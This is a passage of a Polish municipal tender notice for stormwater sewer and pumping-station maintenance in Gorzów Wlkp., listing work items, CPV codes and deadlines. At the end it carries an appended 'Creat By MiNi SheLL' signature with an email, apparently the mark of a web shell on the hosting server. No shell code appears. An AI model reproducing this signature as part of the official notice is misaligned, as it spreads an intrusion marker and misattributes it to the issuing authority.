Wyszczególnienie robót jak w poz. 5.1 bez ujmowania w kalkulacji ceny kratki.
5.3). Wymiana wpustu ulicznego klasy D400 (skrzynki żeliwnej) z zabezpieczeniem (rygiel, zawias, zatrzask) wraz z wykonaniem studzienki ściekowej z gotowych elementów betonowych z osadnikiem - z materiałem - 	jednostka: 1 szt.
Wyszczególnienie robót:jednostka: 1 szt.
Wyszczególnienie robót:
1)rozebranie nawierzchni i podbudowy wokół wpustu,
2) zebranie i odrzucenie gruzu na pobocze,
3) wyjęcie starej skrzynki żeliwnej wpustu,
4)wymurowanie dna studzienki,
5)opuszczenie do wykopu i ustawienie kompletu elementów betonowych,
6) ustawienie wpustu żeliwnego ściekowego,
7)zaklinowanie wpustu,
8) zabetonowanie dna,
9)wykonanie deskowania,
10) ułożenie i zagęszczenie betonu,
11)rozebranie deskowania,
12)uzupełnienie masą asfaltową do niwelety nawierzchni,
13)wykonanie prac porządkowych.
5.4). Uzupełnienie kratki żeliwnej od wpustu deszczowego klasy D400 - z materiałem - jednostka: 1 szt.
Wyszczególnienie robót:
1)wyjęcie uszkodzonej kratki, 
2) oczyszczenie krawędzi korpusu skrzynki żeliwnej, 
3) ułożenie nowej kratki żeliwnej. 
5.5). Uzupełnienie kratki żeliwnej od wpustu deszczowego lub włazu kanałowego bez materiału (materiał Inwestora) - jednostka: 1 szt.
Wyszczególnienie robót jak w poz. 5.4. bez ujmowania w kalkulacji ceny kratki żeliwnej bądź włazu kanałowego.
5.6 ). Regulacja  pionowa istniejącego wpustu ulicznego z nowym osadnikiem - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie kratki ściekowej,
2)usunięcie osadu,
3)rozebranie górnej części studzienki,
4)odkucie uszkodzonej nawierzchni i podbudowy wokół urządzenia,
5)zebranie i odrzucenie gruzu na pobocze,
6)demontaż uszkodzonego osadnika, 
7)montaż nowego osadnika,
8)wykonanie deskowania,
9)ułożenie i zagęszczenie betonu,
10)rozebranie deskowania,
11)osadzenie kratki ściekowej na zaprawie cementowej wraz z jej przygotowaniem,
12)uzupełnienie masą asfaltową do niwelety nawierzchni,
13)wykonanie prac porządkowych. 
5.7). Wymiana włazu kanałowego bez materiału (materiał Inwestora)  - jednostka: 1 szt.
1) zdjęcie uszkodzonej pokrywy włazowej
2) oczyszczenie pierścienia dystansowego
3) założenie włazu z odzysku na studni kanalizacji deszczowej
4) uporządkowanie terenu
5.8)Zabezpieczenie studni kanalizacji deszczowej płytą betonową
założenie płyty betonowej O750 na niezabezpieczoną studnię kanalizacji deszczowej.
5.9).  Regulacja pionowa włazu kanałowego z materiałem w jezdni (żeliwne z wypełnieniem betonowym, klasy D400) i z napisem:Kanalizacja Deszczowa - Gorzów - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie pokrywy włazowej,
2) odkucie nawierzchni i podbudowy wokół urządzenia,
3)zebranie i odrzucenie gruzu na pobocze,
4)wyjęcie włazu,
5)uzupełnienie ewentualnych ubytków (podmurowanie),
6)osadzenie pierścienia dystansowego,
7)osadzenie ponowne włazu na zaprawie cementowej,
8)wykonanie deskowania wokół włazu,
9)ułożenie i zagęszczenie betonu,
10)rozebranie deskowania,
11)uzupełnienie masą asfaltową do niwelety nawierzchni,
12)wykonanie prac porządkowych.
5.10). Regulacja pionowa włazu kanałowego żeliwnego z wypełnieniem betonowym i z napisem: Kanalizacja Deszczowa - Gorzów z materiałem w terenie nieutwardzonym i w chodniku - jednostka: 1 szt. 	
Wyszczególnienie robót:
1)zdjęcie pokrywy włazowej,
2)usunięcie nawierzchni i podbudowy wokół urządzenia na pobocze,
3)wyjęcie włazu,
4) uzupełnienie ewentualnych ubytków (podmurowanie),
5) osadzenie pierścienia dystansowego,
6) osadzenie ponowne włazu na zaprawie cementowej,
7) uzupełnienie nawierzchni,
8)   wykonanie prac porządkowych.
5.11).  Przekazanie wpustu ulicznego klasy D400  z zabezpieczeniem (rygiel, zawias, zatrzask) na potrzeby zamawiającego (cena materiału bez usługi) - jednostka 1 szt.
5.12).  Przekazanie włazu kanałowego klasy D400 żeliwnego z wypełnieniem betonowym i z napisem:Kanalizacja Deszczowa - Gorzów na potrzeby zamawiającego (cena materiału bez usługi) - jednostka 1 szt.
6).  WYMUROWANIE KOMINÓW W STUDNIACH Z CEGŁY KLINKIEROWEJ - z materiałem -  jednostka: 1 szt.
Wyszczególnienie robót:  wymurowanie ścian kominów do wysokości 1m.
7). Uszczelnienie wpustu lub studni kanalizacji deszczowej - jednostka: 1 szt.
Wyszczególnienie robót: 
uzupełnienie ubytków w ściankach oraz wyklejenie nieszczelności wpustów i studni kanalizacji deszczowej.
8)PRZYSPAWANIE ELEMENTÓW KANALIZACJI DESZCZOWEJ - jednostka 1 szt.
9)WYKONANIE DNA BETONOWEGO WE WPUŚCIE - jednostka 1 szt.
10)WYPOMPOWANIE WODY Z TERENU, KTÓRY ULEGŁ PODTOPIENIU - jednostka 1 roboczogodzina
Wyszczególnienie robót: 
1)Wypompowanie wody z terenu który uległ podtopieniu, wskazanego przez Zamawiającego bądź Straż Miejską, Policję przy użyciu wozu asenizacyjnego. 
2)Zamawiający naliczy ilość roboczogodzin na podstawie otrzymanego mms, którego należy przesłać na początku i na koniec przeprowadzonych prac.
11)ROBOTY RÓŻNE NIEOBMIAROWE INTERWENCYJNE, Z  DOJAZDEM  I  WYKORZYSTANIEM SPRZĘTU ORAZ NARZĘDZI  - jednostka: 1 roboczogodzina
Wyszczególnienie robót: 
wykonanie prac nie wyszczególnionych w tabeli z dojazdem i wykorzystaniem sprzętu, narzędzi i materiałów między innymi: usuwanie zawałów, usunięcie korzeni ze światła kolektorów i przykanalików.
12). PRZEGLĄD SIECI KANALIZACJI DESZCZOWEJ - jednostka: 1 roboczogodzina
Wyszczególnienie robót:
przeglądy techniczne wskazanych przez Zamawiającego odcinków sieci kanalizacji deszczowej na terenie miasta Gorzowa Wlkp. między innymi udział w pracach odbiorowych zadań inwestycyjnych - sporządzenie opinii na piśmie.
13). OCENA STANU TECHNICZNEGO KANALIZACJI DESZCZOWEJ - jednostka: 1 mb.
Wyszczególnienie robót:
Przedstawienie na piśmie oceny stanu technicznego kanalizacji deszczowej na podstawie inspekcji telewizyjnej odcinków sieci kanalizacji deszczowej wskazanych przez Zamawiającego oraz sporządzenie oceny stanu technicznego na piśmie z określeniem technologii oraz zakresu prac naprawczych.
14). INSPEKCJA TELEWIZYJNA SIECI KANALIZACJI DESZCZOWEJ - jednostka: 1 roboczogodzina
Wyszczególnienie robót: 
wykonanie inspekcji telewizyjnej wraz z raportem wyznaczonych przez Zamawiającego odcinków kanalizacji deszczowej 
15).  Sprawdzenie sygnału o awarii kanalizacji deszczowej  - jednostka: 1 szt.
Wyszczególnienie robót: 
1)dojazd na miejsce zgłoszenia  awarii kanalizacji deszczowej w mieście 
2)sprawdzenie czy uszkodzeniu powstało na sieci kanalizacji deszczowej i w razie potrzeby zabezpieczenie miejsca awarii przez ustawienie odpowiedniego oznakowania drogowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.48.00.00-5, 50.80.00.00-3, 50.51.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie przepompowni wód opadowych i przepompowni melioracyjnej Zawarcie na terenie miasta Gorzowa Wlkp.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia:
Przedmiotem zamówienia objęte jest  utrzymanie przepompowni wód opadowych i przepompowni melioracyjnej Zawarcie na terenie miasta Gorzowa Wlkp. zlokalizowanych:
a) przepompownie wód opadowych: ul. Kasprzaka, ul. Błotna, ul. Bierzarina,  ul. Piłsudskiego, ul. Wał Okrężny WDK, ul. Wał Okrężny BP, ul. Strażacka, ul. Złotego  Smoka
b) przepompownia melioracyjna Zawarcie:
- u zbiegu Wału Okrężnego i  Poprzecznego.
UWAGA:
Przepompownia przy ul. Wał Okrężny BP nie została jeszcze przekazana do eksploatacji; planowany  czas odbioru przepompowni został wyznaczony na dzień 15.12.2012r.  
2. Zamówienie obejmuje:
I.  Zamówienie obejmuje następujący zakres prac:
1)Obsługa i bieżąca konserwacja przepompowni zgodnie z załączoną Dokumentacją  Techniczno Ruchową, a w tym: 
a)oczyszczanie komory, w której zainstalowane są pompy,
b)pokrycie kosztów umowy na usługi telekomunikacyjne  z urządzenia przekazującego informację o nieprawidłowej pracy i stanach awaryjnych pomp ww. przepompowniach do trzech aparatów komórkowych.
2)Prowadzenie książek obiektów ww. przepompowni.
3)Zgodnie z art. 62 Prawa budowlanego przeprowadzenie okresowej kontroli polegającej na sprawdzeniu stanu technicznego poszczególnych obiektów. Ww. działanie należy odnotować w książce obiektów.
4)Wykonanie pomiarów elektrycznych zgodnie z obowiązującymi przepisami i normami w terminie do 30.06.2013r. i przekazanie wyników Zamawiającemu.
5)Przedłożenie raz na sześć miesięcy raportu ze stanu wszystkich przepompowni.
6)Koszenie terenów przepompowni w okresie wegetacyjnym tj. od 1 kwietnia do 1 listopada  raz w miesiącu. 
a)ul. Kasprzaka ok. 330 m2(teren w obrębie ogrodzenia oraz 1 m pasem wokół ogrodzenia),
b)ul. Błotnej ok. 100 m2 (teren w obrębie ogrodzenia oraz 1 m pasem wokół ogrodzenia),
c)ul. Wał Okrężny GDK ok. 200 m2
d)ul. Wał Okrężny BP ok. 140 m2
e)ul. Bierzarina ok. 120 m2
f)ul. Strażackiej ok. 4 m2
g)ul. Złotego Smoka ok.16 m2 
h)przepompownia melioracyjna Zawarcie teren w obrębie ogrodzenia obiektu. (teren w obrębie ogrodzenia obiektu, schodów do obiektu  i przy wylocie do Kanału Ulgi). 
7)Usunięcie wszelkich nieczystości z terenu ww. przepompowni oraz przepustu na kanale Mazowieckim wraz z ich utylizacją bądź wywiezieniem na wysypisko (dopływ do zbiornika retencyjnego przy przepompowni melioracyjnej) w całym okresie objętym umową.
8)Zapewnienie całodobowego dyżuru, również w dni wolne od pracy oraz niedziele i święta.
9)Zapewnienie numeru alarmowego, który należy umieścić na obiekcie przepompowni w widocznym miejscu. Numer alarmowy musi być dostępny całą dobę.
10) Przechowanie elementów przepompowni wód deszczowych zdemontowanej przy ul. Husarskiej.
II. Czas przystąpienia do usunięcia awarii oraz zabezpieczenia terenu objętego zagrożeniem związanym z wystąpieniem awarii od chwili powiadomienia nie dłuższy niż 2 godziny.
III. Wykonawca zobowiązany jest zgłosić Zamawiającemu przystąpienie do usunięcia awarii w zakresie bieżącej eksploatacji np.: usunięcie zanieczyszczeń z komory pompowni, jej przyczyny a także zakończenie prac. Wykonawca zobowiązany jest przedstawić Zamawiającemu raport ze wszystkich czynności związanych z usunięciem awarii W przypadku awarii wykraczającej poza zakres bieżącej eksploatacji tj. uszkodzenie pompy należy zgłosić Zamawiającemu konieczność przeprowadzenia naprawy. Przedmiotowe naprawy zostaną przeprowadzone na podstawie odrębnej umowy bądź zlecenia.
IV. Przekazanie obiektów do obsługi i konserwacji dokonane zostanie protokołem przejęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.48.00.00-5, 50.80.00.00-3, 50.51.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com